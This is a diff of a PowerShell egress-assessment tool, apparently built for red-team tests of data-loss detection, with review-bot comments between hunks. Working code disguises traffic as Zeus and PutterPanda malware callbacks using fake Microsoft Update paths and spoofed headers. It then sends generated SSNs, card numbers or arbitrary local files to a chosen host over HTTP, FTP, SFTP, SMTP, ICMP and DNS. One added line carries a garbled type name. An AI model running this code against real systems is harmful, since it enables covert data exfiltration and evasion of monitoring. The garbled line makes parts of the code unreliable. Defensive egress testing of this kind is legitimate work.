'/Scripts/_notes/build/gate.php', '/REMOVED/.pop/bot.exe', + '/REMOVED/.pop/config.bin', '/REMOVED/.pop/gate.php', + '/KINS/panel/bot.exe', '/KINS/panel/config.jpg', + 
'/KINS/panel/gate.php', '/panel/config.jpg', '/panel/gate.php', + '/walex/files/bot.exe', '/walex/files/config.jpg', + '/walex/files/gate.php', '/e7/bot.exe', '/e7/cfg.bin', + '/e7/gate.php', + '/wp-admin/css/colors/coffee/cat/server/config.jpg', + '/wp-admin/css/colors/coffee/cat/server/gate.php', + '/site/S/13897652/5112/file.php', + '/site/S/13897652/5112/gate.php', + '/images/js/osomo/panel/config.jpg', + '/images/js/osomo/panel/gate.php', + '/themes/panel/config.jp', '/themes/panel/gate.php', + '/system/eusat/telesa/config.jpg', '/sadcxvbv/vdfbffddf.php', + '/wqwcqqw/sasasacw.php', '/images/server/file.php', + '/images/server/gate.php', '/cache/lcitorg/config.bin', + '/cache/lcitorg/gate.php', '/form/panel/config.jpg', + '/form/panel/gate.php', '/backup/gate.php', + '/backup/jera.jpg', '/images/file.php', + '/images/js/panel/config.jpg', '/images/js/panel/gate.php', + '/images/config.jpg', '/images/gate.php', + '/slim-cita/helps/file.php', '/slim-cita/helps/gate.php', + '/kin/panelz/config.jpg', '/kin/panelz/gate.php', + '/image/Panel/config.jpg', '/folder/config.bin', + '/folder/secure.php', '/plugins/panel/config.jpg', + '/plugins/panel/gate.php', + '/wp-content/plugins/slxcdfrdmn9r0x/j7.php', '/q/gate.php', + '/q/outl.jpg', '/media/k2/file.php', '/media/k2/gate.php', + '/js/MOM/config.jpg', '/js/MOM/gate.php', + '/lung/panel/config.jpg', '/wp/config.jpg', + '/wp/gate.php', '/data/config.jpg', '/data/gate.php', + '/templates/beez/bot.exe', '/templates/beez/config.bin', + '/templates/beez/gate.php', '/wp-includes/css/new/config.jpg', + '/wp-includes/css/new/gate.php', + '/language/pdf_fonts/server/bot.exe', + '/language/pdf_fonts/server/config.bin', + '/language/pdf_fonts/server/gate.php', '/js/liscence.php', + '/js/userslogin.php', '/ijo/config.jpg', '/ijo/gate.php', + '/Mix/valeg/bot.exe', '/Mix/valeg/config.bin', + '/Mix/valeg/gate.php', '/media/media/js/.js/ajax.php', + '/media/media/js/.js/color.jpg', '/wpc/Panel/config.jpg', + '/wpc/Panel/gate.php', 
'/images/gate.php', '/images/stab.jpg', + '/wpadm/Panel/config.jpg', '/wpadm/Panel/gate.php', + '/admin/b7.php', '/admin/file.php', '/amed/config.jpg', + '/amed/gate.php', '/sadcxvbv/vdfbffddf.php', + '/wpimages/image.php', '/ger/config.jpg', '/ger/gate.php', + '/percy/panel/config.jpg', '/percy/panel/gate.php', + '/map/Icons/outglav.exe', '/map/Icons/Religion/brah.png', + '/map/Icons/Religion/exejfjfjexe.exe', '/images/config.jpg', + '/images/gate.php', '/file.php', '/gate.php', '/.css/config.jpg', + '/.css/gate.php', '/colobus/gate.php', '/colobus/vsam.jpg', + '/news/secure.php', '/news/vuan.bin', '/.id/file.php', + '/.id/gate.php', + '/fast-move/cidphp/file.php', '/fast-move/cidphp/gate.php', + '/overopen/panel/config.bin', '/overopen/panel/secure.php', + '/chromez/config.jpg', '/chromez/gate.php', '/libraries/db.php', + '/sadcxvbv/vdfbffddf.php', '/wqwcqqw/sasasacw.php', + '/wp-comment/baba.jpg', '/wp-comment/gate.php', + '/alumno309/images/base.bin', '/alumno309/images/base.exe', + '/alumno309/images/secure.php', + '/wp-content/plugins/wp-db-backup-made/das.db', + '/ta_images/tools.php', '/plank/panel/config.jpg', + '/includes/database/http/config.jpg', + '/includes/database/http/zin.php', '/wqwcqqw/sasasacw.php', + '/administrator/modules/mod_menu/help/config.jpg', + '/administrator/modules/mod_menu/help/gate.php', '/old/jx36.bin', + '/old/jx36.exe', '/old/secure.php', '/images/icons/bt.exe', + '/images/icons/cfg.bin', '/images/icons/gate.php', '/t/wpg.php', + '/forum.php', '/config.php', '/wp-blog/gate.php', + '/wp-blog/mell.jpg', '/descargas/adm/gate.php', + '/descargas/config/orqu.bin', '/wp-rss.php', '/images/gate.php', + '/images/outl.jpg', '/images/smilies/raye.jpg', + '/images/kin/config.jpg', '/jaextmanager_data/rimm.bin', + '/jaextmanager_data/secure.php', '/js/cssme/file.php', + '/js/cssme/thread.php', '/mss/plugins/system/config.bin', + '/mss/plugins/system/gate.php', '/wp-admin/maint/config.bin', + '/wp-admin/maint/gate.php', 
'/blog/wp-content/uploads/kim.dot', + '/images/secure.php', '/images/todo.bin', '/images/todo.exe', + '/plugins/system/bot.exe', '/plugins/system/config.bin', + '/plugins/system/gate.php', '/modules/mod_footer/tmpl/file.php', + '/modules/mod_footer/tmpl/gate.php', '/modules/secure.php', + '/modules/warp.bin', '/modules/warp.exe', '/file.php', + '/gate.php', '/db1/config.jpg', '/db1/gate.php', + '/katolog/thumbs/panel/config.jpg', + '/katolog/thumbs/panel/gate.php') + #$post_data = @('zeus_id uid=0(root) gid=0(root) groups=0(root)','zeus_whoami root'},'zeus_dir C:\\, C:\\Windows', + # 'zeus_ps': 'svchost.exe, spoolsvc.exe, explorer.exe, iexplorer.exe','zeus_ipconfig': '192.168.1.15 255.255.255.0 192.168.1.1', + # 'zeus_ping': 'google.com time=13.6, 15.1, 19.8, 20') + + # Detect what datatype we're sending + if ($Datatype -contains "ssn" -or "cc" -or "identity") + { + + if ($Datatype -eq "ssn") + { + Generate-SSN + $Data = $AllSSN + } + elseif ($Datatype -eq "cc") + { + Generate-CreditCards + $Data = $AllCC + } + elseif ($Datatype -eq "identity") + { + Generate-Identity + $Data = $AllNames + } + } + else + { + Write-Verbose "[*] You did not provide a data type to generate." + Return + } + + Do + { + try + { + $ranURI = Get-Random -InputObject $uris + if ($client -eq "http") + { + $Url = "http://" + $IP + $ranURI + } + elseif ($client -eq "https") + { + $Url = "https://" + $IP + $ranURI + } + $ranHost = Get-Random -InputObject $domains + [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } + $uri = New-Object -TypeName System.Uri -ArgumentList $Url + $wc = New-Object -TypeName System.Net.WebClient + Write-Verbose $uri + $wc.Headers.Add('Accept', '*/*') + $wc.Headers.Add('User-Agent', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)') + $wc.Headers.Add('Host', $ranHost) + $wc.Headers.Add('Pragma', 'no-cache') + Write-Verbose "Uploading data..." 
+ $wc.UploadString($uri, $Data) + } + catch + { + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, tranfer failed with error:" + Write-Verbose $ErrorMessage + Break + } + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." + } + While ($loops -gt 0) + } + + function Use-PutterPanda + { + function Gen-Numbers($num) + { + if ($num -eq 5) + { + Get-Random -Minimum 10000 -Maximum 99999 + } + elseif ($num -eq 2) + { + Get-Random -Minimum 10 -Maximum 99 + } + elseif ($num -eq 6) + { + Get-Random -Minimum 100000 -Maximum 999999 + } + elseif ($num -eq 7) + { + Get-Random -Minimum 1000000 -Maximum 9999999 + } + } + + $domains = @('ctable.org', 'gamemuster.com', 'kyoceras.net', 'nestlere.com', + 'raylitoday.com', 'renewgis.com', 'siseau.com', 'bmwauto.org', + 't008.net', 'vssigma.com', 'anyoffice.info', 'it-bar.net', + 'jj-desk.com', 'satelliteclub.info', 'space-today.info', + 'sst1.info', 'stream-media.info', 'webfilestore.net') + $encodedHostnames = @('SG9tZVBD', 'Q29tcGFueVdvcmtzdGF0aW9u', + 'd29ya3N0YXRpb24tMTMy', 'UHJpbWFyeURvbWFpbkNvbnRyb2xsZXI=', + 'ZmlsZXNlcnZlcg==', 'd2Vic2VydmVy', 'RE5Tc2VydmVyMg==', + 'Yml0c3kubWl0LmVkdQ==', 'c2VydmVyMS5jaWEuZ292', + 'ZXZpZGVuY2UuZmJpLmdvdg==', 'ZGIuc3NhLmdvdg==', + 'cGlpLmZkYS5nb3Y=', 'ZGF0YS5mZGEuZ292') + $uris = @($("/search5" + $(Gen-Numbers(5)) + "?h1=" + $(Gen-Numbers(2)) + "&h2=" + $(Get-Random -SetSeed 13) + "&h3=" + $(Gen-Numbers(6)) + "&h4=" + $(Gen-Numbers(5))), + $("/microsoft/errorpost/default/connect.aspx?ID=" + $(Gen-Numbers(5))), + $("/MicrosoftUpdate/ShellEX/KB" + $(Gen-Numbers(7)) + '/default.aspx?tmp=' + $(Get-Random -InputObject $encodedHostnames)), + $("/microsoft/errorpost/default.aspx?ID=" + $(Gen-Numbers(5))), + $("/MicrosoftUpdate/GetUpdate/KB" + $(Gen-Numbers(7)) + "/default.asp?tmp=" + $(Get-Random -InputObject $encodedHostnames)), + $("/MicrosoftUpdate/GetFiles/KB" + $(Gen-Numbers(7)) + "/default.asp?tmp=" + $(Get-Random -InputObject 
$encodedHostnames)), + $("/MicrosoftUpdate/WWRONG/KB" + $(Gen-Numbers(7)) + "/default.asp?tmp=" + $(Get-Random -InputObject $encodedHostnames))) + + # Detect what datatype we're sending + if ($Datatype -contains "ssn" -or "cc" -or "identity") + { + + if ($Datatype -eq "ssn") + { + Generate-SSN + $Data = $AllSSN + } + elseif ($Datatype -eq "cc") + { + Generate-CreditCards + $Data = $AllCC + } + elseif ($Datatype -eq "identity") + { + Generate-Identity + $Data = $AllNames + } + } + else + { + Write-Verbose "[*] You did not provide a data type to generate." + Return + } + + Do + { + try + { + $ranURI = Get-Random -InputObject $uris + if ($client -eq "http") + { + $Url = "http://" + $IP + $ranURI + } + elseif ($client -eq "https") + { + $Url = "https://" + $IP + $ranURI + } + $ranHost = Get-Random -InputObject $domains + [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } + $uri = New-Object -TypeName System.Uri -ArgumentList $Url + $wc = New-Object -TypeName System.Net.WebClient + Write-Verbose $uri + $wc.Headers.Add('Accept', '*/*') + $wc.Headers.Add('User-Agent', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)') + $wc.Headers.Add('Host', $ranHost) + $wc.Headers.Add('Pragma', 'no-cache') + Write-Verbose "Uploading data..." + $wc.UploadString($uri, $Data) + } + catch + { + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, tranfer failed with error:" + Write-Verbose $ErrorMessage + Break + } + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." 
+ } + While ($loops -gt 0) + } + ############################# + # End Malware Signatures # + ############################# + function Use-Actor($Actor) + { + if ($Actor -contains "Zeus") + { + Use-Zeus + Break + } + elseif ($Actor -contains "PutterPanda") + { + Use-PutterPanda + Break + } + elseif ($Actor -contains "DarkHotel") + { + Use-DarkHotel + Break + } + elseif ($Actor -contains "Etumbot") + { + Use-Etumbot + Break + } + } + + function Use-HTTP + { + + function Get-UserAgent($UASelect) + { + function Use-Mozilla + { + $script:UserAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" + } + + function Use-InternetExplorer + { + $script:UserAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" + } + + function Use-Safari + { + $script:UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A" + } + + if ($UASelect -contains "IE" -or "Moz" -or "Saf") + { + + if ($UASelect -contains "IE") + { + Use-InternetExplorer + } + if ($UASelect -contains "Moz") + { + Use-Mozilla + } + if ($UASelect -contains "Saf") + { + Use-Safari + } + } + else + { + $r = Get-Random -Minimum 1 -Maximum 3 + Write-Verbose "Switching function" + switch ($r) # Use switch statement to + { + 1 { Use-Mozilla } + 2 { Use-InternetExplorer } + 3 { Use-Safari } + } + } + + } + # Detect what datatype we're sending + if ($Datatype -contains "ssn" -or "cc" -or "identity") + { + $totalupload = 0 + if ($Datatype -eq "ssn") + { + Generate-SSN + $Data = $AllSSN + } + elseif ($Datatype -eq "cc") + { + Generate-CreditCards + $Data = $AllCC + } + elseif ($Datatype -eq "identity") + { + Generate-Identity $Data = $AllNames } if ($client -eq "http") 
@@ -384,32 +1100,9 @@ function Invoke-EgressAssess { $Url = "https://" + $IP + "/post_data.php" } - $uri = New-Object -TypeName System.Uri -ArgumentList $Url - $wc = New-Object -TypeName System.Net.WebClient - if ($proxy) - { - $proxy = [System.Net.WebRequest]::GetSystemWebProxy() - $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials - $wc.proxy = $proxy - } - Do { - Try { - Write-Verbose "Uploading data..." - $wc.UploadString($uri, $Data) - $totalupload += $sizedata - } - catch - { - $ErrorMessage = $_.Exception.Message - Write-Verbose "[*] Error, tranfer failed with error:" - Write-Verbose $ErrorMessage - Break - } - Write-Verbose "[*] Transfer complete!" - $loops-- - Write-Verbose "[*] $loops loops remaining.." - } While ($loops -gt 0) + } + elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") { if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } @@ -434,13 +1127,26 @@ function Invoke-EgressAssess [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } $uri = New-Object -TypeName System.Uri -ArgumentList $Url $wc = New-Object -TypeName System.Net.WebClient + if ($UserAgent) + { + Get-UserAgent -UASelect $UserAgent + $wc.Headers.Add('UserAgent', $script:UserAgent) + } + else + { + Get-UserAgent -UASelect "" + $wc.Headers.Add('UserAgent', $script:UserAgent) + } + if ($proxy) { - $proxy = [System.Net.WebRequest]::GetSystemWebProxy() - $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials + $proxy = [Slslsstem.Net.WebRequest]::GetSystemWebProxy() + $proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials $wc.proxy = $proxy } - if ($filetransfer -eq $true) { + if ($filetransfer -eq $true) + { + $data = Get-Content $SourceFilePath -Encoding Byte -ReadCount 0 $wc.Headers.Add('Content-Type', 'mimeType') $wc.Headers.Add('Filename', $FileName) 
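Review bot: `$proxy = [Slslsstem.Net.WebRequest]::GetSystemWebProxy()` in the new `if ($proxy)` branch is not a resolvable type name, so any run that passes `-proxy` throws before the upload; it should read `$proxy = [System.Net.WebRequest]::GetSystemWebProxy()`. Both new `$wc.Headers.Add('UserAgent', $script:UserAgent)` calls also use a non-standard header name, so the request carries a header literally named `UserAgent` while its real User-Agent stays empty, defeating the browser selection; use `$wc.Headers.Add('User-Agent', $script:UserAgent)`. The `Get-UserAgent -UASelect ""` fallback appears never to reach the random-selection branch, because `if ($UASelect -contains "IE" -or "Moz" -or "Saf")` in Get-UserAgent (defined earlier in this file, outside the hunk) evaluates the bare literal "Moz" as true on its own, leaving `$script:UserAgent` unset in the default case; worth confirming. Use-HTTP starts and ends outside this hunk.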
@@ -448,77 +1154,16 @@ function Invoke-EgressAssess $wc.UploadData($uri, 'POST', $data) Write-Verbose "[*] Transaction Complete." } - - else { - Write-Verbose "Uploading data.." - $wc.UploadString($uri, $Body) - Write-Verbose "[*] Transaction Complete." - } - } - - function Use-Ftp - { - if ($Datatype -contains "ssn" -or "cc" -or "identity") - { - if ($Datatype -eq "ssn") { - Generate-SSN - $FTPData = $AllSSN - } - elseif ($Datatype -eq "cc") { - Generate-CreditCards - $FTPData = $AllCC - } - elseif ($Datatype -eq "identity") { - Generate-Names - $FTPData = $AllNames - } - elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") { - if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } - $Path = get-childitem $Datatype | % { $_.Name } - $filetransfer = $True - } - } - if ($filetransfer -eq $True) { - $Destination = "ftp://" + $IP + "/" + $Path - $SourceFilePath = Get-ChildItem $Datatype | % { $_.FullName } - $webclient = New-Object System.Net.WebClient - $webclient.Credentials = New-Object System.Net.NetworkCredential($username,$password) - if ($proxy) + else + { + Do { - $proxy = [System.Net.WebRequest]::GetSystemWebProxy() - $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials - $webclient.proxy = $proxy - } - $uri = New-Object System.Uri($Destination) - $webclient.UploadFile($uri, $SourceFilePath) - Write-Verbose "[*] File Transfer Complete." 
- } - else { - Do { - Try { - $Date = Get-Date -Format Mdyyyy_hhmmss - $Path = "ftpdata" + $Date + ".txt" - $Destination = "ftp://" + $IP + "/" + $Path - $Credential = New-Object -TypeName System.Net.NetworkCredential -ArgumentList $Username, $Password - - # Create the FTP request and upload the file - $FtpRequest = [System.Net.FtpWebRequest][System.Net.WebRequest]::Create($Destination) - if ($proxy) + Try { - $proxy = [System.Net.WebRequest]::GetSystemWebProxy() - $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials - $FtpRequest.proxy = $proxy - } - $FtpRequest.KeepAlive = $False - $FtpRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile - $FtpRequest.Credentials = $Credential - # Get the request stream, and write the file bytes to the stream - $Encoder = [system.Text.Encoding]::UTF8 - $RequestStream = $FtpRequest.GetRequestStream() - $Encoder.GetBytes($FTPData) | % { $RequestStream.WriteByte($_); } - $RequestStream.Close() - Write-Verbose "[*] File Transfer Complete." + Write-Verbose "Uploading data..." + $wc.UploadString($uri, $Data) + $totalupload += $sizedata } catch { 
@@ -530,9 +1175,96 @@ function Invoke-EgressAssess Write-Verbose "[*] Transfer complete!" $loops-- Write-Verbose "[*] $loops loops remaining.." - } While ($loops -gt 0) - } - + } + While ($loops -gt 0) + } + } + + function Use-Ftp + { + if ($Datatype -contains "ssn" -or "cc" -or "identity") + { + if ($Datatype -eq "ssn") + { + Generate-SSN + $FTPData = $AllSSN + } + elseif ($Datatype -eq "cc") + { + Generate-CreditCards + $FTPData = $AllCC + } + elseif ($Datatype -eq "identity") + { + Generate-Identity + $FTPData = $AllNames + } + + elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") + { + if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } + $Path = get-childitem $Datatype | % { $_.Name } + $filetransfer = $True + } + } + if ($filetransfer -eq $True) + { + $Destination = "ftp://" + $IP + "/" + $Path + $SourceFilePath = Get-ChildItem $Datatype | % { $_.FullName } + $webclient = New-Object System.Net.WebClient + $webclient.Credentials = New-Object System.Net.NetworkCredential($username, $password) + if ($proxy) + { + $proxy = [System.Net.WebRequest]::GetSystemWebProxy() + $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials + $webclient.proxy = $proxy + } + $uri = New-Object System.Uri($Destination) + $webclient.UploadFile($uri, $SourceFilePath) + Write-Verbose "[*] File Transfer Complete." 
+ } + else + { + Do + { + Try + { + $Date = Get-Date -Format Mdyyyy_hhmmss + $Path = "ftpdata" + $Date + ".txt" + $Destination = "ftp://" + $IP + "/" + $Path + $Credential = New-Object -TypeName System.Net.NetworkCredential -ArgumentList $Username, $Password + + # Create the FTP request and upload the file + $FtpRequest = [System.Net.FtpWebRequest][System.Net.WebRequest]::Create($Destination) + if ($proxy) + { + $proxy = [System.Net.WebRequest]::GetSystemWebProxy() + $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials + $FtpRequest.proxy = $proxy + } + $FtpRequest.KeepAlive = $False + $FtpRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile + $FtpRequest.Credentials = $Credential + # Get the request stream, and write the file bytes to the stream + $Encoder = [system.Text.Encoding]::UTF8 + $RequestStream = $FtpRequest.GetRequestStream() + $Encoder.GetBytes($FTPData) | % { $RequestStream.WriteByte($_); } + $RequestStream.Close() + Write-Verbose "[*] File Transfer Complete." + } + catch + { + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, tranfer failed with error:" + Write-Verbose $ErrorMessage + Break + } + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." + } + While ($loops -gt 0) + } } function Use-SFTP 
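Review bot: In the string branch of Use-Ftp, `$RequestStream.Close()` runs only on the success path; if `GetRequestStream()` or a `WriteByte` call throws, the catch logs and breaks while the FTP request stream stays open, so wrap the write in `try { ... } finally { $RequestStream.Close() }`. Piping `$Encoder.GetBytes($FTPData) | % { $RequestStream.WriteByte($_); }` also issues one call per byte; `$bytes = $Encoder.GetBytes($FTPData); $RequestStream.Write($bytes, 0, $bytes.Length)` does the same work in one call. The file-path case is reached only as an `elseif` under `if ($Datatype -contains "ssn" -or "cc" -or "identity")`, which as far as I can tell is always true because the bare "cc" literal is truthy, so the structure works by accident rather than by the test; the same shape is repeated in the Use-SFTP, Use-SMTP, Use-ICMP and Use-DNS hunks that follow.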
@@ -546,21 +1278,25 @@ function Invoke-EgressAssess } if ($Datatype -contains "ssn" -or "cc" -or "identity") { - if ($Datatype -eq "ssn") { + if ($Datatype -eq "ssn") + { Generate-SSN $FTPData = $AllSSN } - elseif ($Datatype -eq "cc") { + elseif ($Datatype -eq "cc") + { Generate-CreditCards $FTPData = $AllCC } - elseif ($Datatype -eq "identity") { - Generate-Names + elseif ($Datatype -eq "identity") + { + Generate-Identity $FTPData = $AllNames } - - elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") { - if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } + + elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") + { + if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } } } else @@ -579,11 +1315,13 @@ function Invoke-EgressAssess Write-Verbose "[*] Error loading dll" Break } - - if ($global:FileTransfer -eq $True) { + + if ($global:FileTransfer -eq $True) + { $Path = get-childitem $Datatype | % { $_.Name } } - else { + else + { $Date = Get-Date -Format Mdyyyy_hhmmss $Path = "ftpdata" + $Date + ".txt" try @@ -597,7 +1335,7 @@ function Invoke-EgressAssess Write-Verbose $ErrorMessage Break } - } + } # Connect to Egress-Assess Server try { @@ -610,8 +1348,10 @@ function Invoke-EgressAssess Write-Verbose "[*] Connection failed" Return } - if ($global:FileTransfer -eq $True) { - try { + if ($global:FileTransfer -eq $True) + { + try + { Write-Verbose "[*] Uploading data.." $SourceFilePath = Get-ChildItem $Datatype | % { $_.FullName } $FileStream = [System.IO.File]::OpenRead("$SourceFilePath") @@ -623,14 +1363,17 @@ function Invoke-EgressAssess $sftpClient.Disconnect() $sftpClient.Dispose() } - catch { + catch + { $ErrorMessage = $_.Exception.Message Write-Verbose $ErrorMessage Break } } - else { - try { + else + { + try + { Write-Verbose "[*] Uploading data.." $FileStream = [System.IO.File]::OpenRead("$env:temp\$Path") $sftpClient.UploadFile($FileStream, $Path) 
@@ -643,7 +1386,8 @@ function Invoke-EgressAssess $ErrorMessage = $_.Exception.Message Remove-Item -Path $env:temp\$Path } - catch { + catch + { $ErrorMessage = $_.Exception.Message Write-Verbose $ErrorMessage Break 
@@ -656,71 +1400,84 @@ function Invoke-EgressAssess { if ($Datatype -contains "ssn" -or "cc" -or "identity") { - if ($Datatype -eq "ssn") { + if ($Datatype -eq "ssn") + { Generate-SSN $SMTPData = $AllSSN } - elseif ($Datatype -eq "cc") { + elseif ($Datatype -eq "cc") + { Generate-CreditCards $SMTPData = $AllCC } - elseif ($Datatype -eq "identity") { - Generate-Names + elseif ($Datatype -eq "identity") + { + Generate-Identity $SMTPData = $AllNames } - - elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") { - if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } - $filetransfer = $True - $SourceFilePath = Get-ChildItem $Datatype | % { $_.FullName } - } + + elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") + { + if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } + $filetransfer = $True + $SourceFilePath = Get-ChildItem $Datatype | % { $_.FullName } + } } else { Write-Verbose "[*] You did not provide a data type to generate." } - Do { - Try { - if ($filetransfer -eq $true) { - Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "EgressAssess With Attachment" -Attachments "$SourceFilePath" -SmtpServer $IP - } - else { - Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "$SMTPData" -SmtpServer $IP - } - } - catch + Do { - $ErrorMessage = $_.Exception.Message - Write-Verbose "[*] Error, tranfer failed with error:" - Write-Verbose $ErrorMessage - Break + Try + { + if ($filetransfer -eq $true) + { + Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "EgressAssess With Attachment" -Attachments "$SourceFilePath" -SmtpServer $IP + } + else + { + Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "$SMTPData" -SmtpServer $IP + } + } + catch + { + $ErrorMessage = 
$_.Exception.Message + Write-Verbose "[*] Error, tranfer failed with error:" + Write-Verbose $ErrorMessage + Break + } + Write-Verbose "[*] Transfer complete!" + $loops-- + Write-Verbose "[*] $loops loops remaining.." } - Write-Verbose "[*] Transfer complete!" - $loops-- - Write-Verbose "[*] $loops loops remaining.." - } While ($loops -gt 0) + While ($loops -gt 0) } function Use-ICMP { if ($Datatype -contains "ssn" -or "cc" -or "identity") { - if ($Datatype -eq "ssn") { + if ($Datatype -eq "ssn") + { Generate-SSN [string]$ICMPData = $AllSSN } - elseif ($Datatype -eq "cc") { + elseif ($Datatype -eq "cc") + { Generate-CreditCards [string]$ICMPData = $AllCC } - elseif ($Datatype -eq "identity") { - Generate-Names + elseif ($Datatype -eq "identity") + { + Generate-Identity [string]$ICMPData = $AllNames } - - elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") { - if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } - $filetransfer = $true + + elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") + { + if (!(Test-Path -Path $Datatype)) { Throw "File doesnt exist" } + $filetransfer = $true } } else @@ -734,8 +1491,8 @@ function Invoke-EgressAssess $FinalDestination = [System.Net.Dns]::GetHostEntry($IP) } catch - { Write-Verbose "[*] Hostname not resolved" - + { + Write-Verbose "[*] Hostname not resolved" Return } } @@ -747,7 +1504,7 @@ function Invoke-EgressAssess $PacketNumber = 1 $bufferSize = 1050 $Timeout = 1000 - + if ($FileTransfer -eq $True) { $Delimiter = '.:::-989-:::.' 
@@ -779,22 +1536,24 @@ function Invoke-EgressAssess } else { - Do { - try { + Do + { + try + { Write-Verbose "[*] Sending data via ICMP." [int]$TotalPackets = ($ICMPData.length/$bufferSize) While ($ByteReader -le ($ICMPData.length - $bufferSize)) { - Write-Verbose "[*] Sending $PacketNumber of $TotalPackets packets" - $DataToSend = $ICMPData.Substring($ByteReader, $bufferSize) - $Encoder = [system.Text.Encoding]::UTF8 - $DataBytes = $Encoder.GetBytes($DataToSend) - $EncodedData = [System.Convert]::ToBase64String($DataBytes) - $Buffer = $Encoder.GetBytes($EncodedData) - $Ping = New-Object -TypeName System.Net.NetworkInformation.Ping - $PingReply = $Ping.Send($FinalDestination, $Timeout, $Buffer) - $ByteReader += $bufferSize - $PacketNumber++ + Write-Verbose "[*] Sending $PacketNumber of $TotalPackets packets" + $DataToSend = $ICMPData.Substring($ByteReader, $bufferSize) + $Encoder = [system.Text.Encoding]::UTF8 + $DataBytes = $Encoder.GetBytes($DataToSend) + $EncodedData = [System.Convert]::ToBase64String($DataBytes) + $Buffer = $Encoder.GetBytes($EncodedData) + $Ping = New-Object -TypeName System.Net.NetworkInformation.Ping + $PingReply = $Ping.Send($FinalDestination, $Timeout, $Buffer) + $ByteReader += $bufferSize + $PacketNumber++ } } catch @@ -809,7 +1568,8 @@ function Invoke-EgressAssess $PacketNumber = 0 $loops-- Write-Verbose "[*] $loops loops remaining.." - } While ($Loops -gt 0) + } + While ($Loops -gt 0) } } 
@@ -818,27 +1578,33 @@ function Invoke-EgressAssess { if ($Datatype -contains "ssn" -or "cc" -or "identity") { - if ($Datatype -eq "ssn") { + if ($Datatype -eq "ssn") + { Generate-SSN [string]$DNSData = $AllSSN } - elseif ($Datatype -eq "cc") { + elseif ($Datatype -eq "cc") + { Generate-CreditCards [string]$DNSData = $AllCC } - elseif ($Datatype -eq "identity") { - Generate-Names + elseif ($Datatype -eq "identity") + { + Generate-Identity [string]$DNSData = $AllNames } - - elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") { - Write-Verbose "[*] You did not provide a data type to generate." - Write-Verbose "[*] DNS file transfers currently not supported." - break + + elseif ($Datatype -notcontains "ssn" -or "cc" -or "identity") + { + Write-Verbose "[*] You did not provide a data type to generate." + Write-Verbose "[*] DNS file transfers currently not supported." + break } } - Do { - try { + Do + { + try + { [int]$MaxLenth = 63 [int]$DefaultLength = 35 [int]$ByteReader = 0 @@ -870,10 +1636,10 @@ function Invoke-EgressAssess } catch { - $ErrorMessage = $_.Exception.Message - Write-Verbose "[*] Error, DNS data tranfer failed with error:" - Write-Verbose $ErrorMessage - Break + $ErrorMessage = $_.Exception.Message + Write-Verbose "[*] Error, DNS data tranfer failed with error:" + Write-Verbose $ErrorMessage + Break } } } 
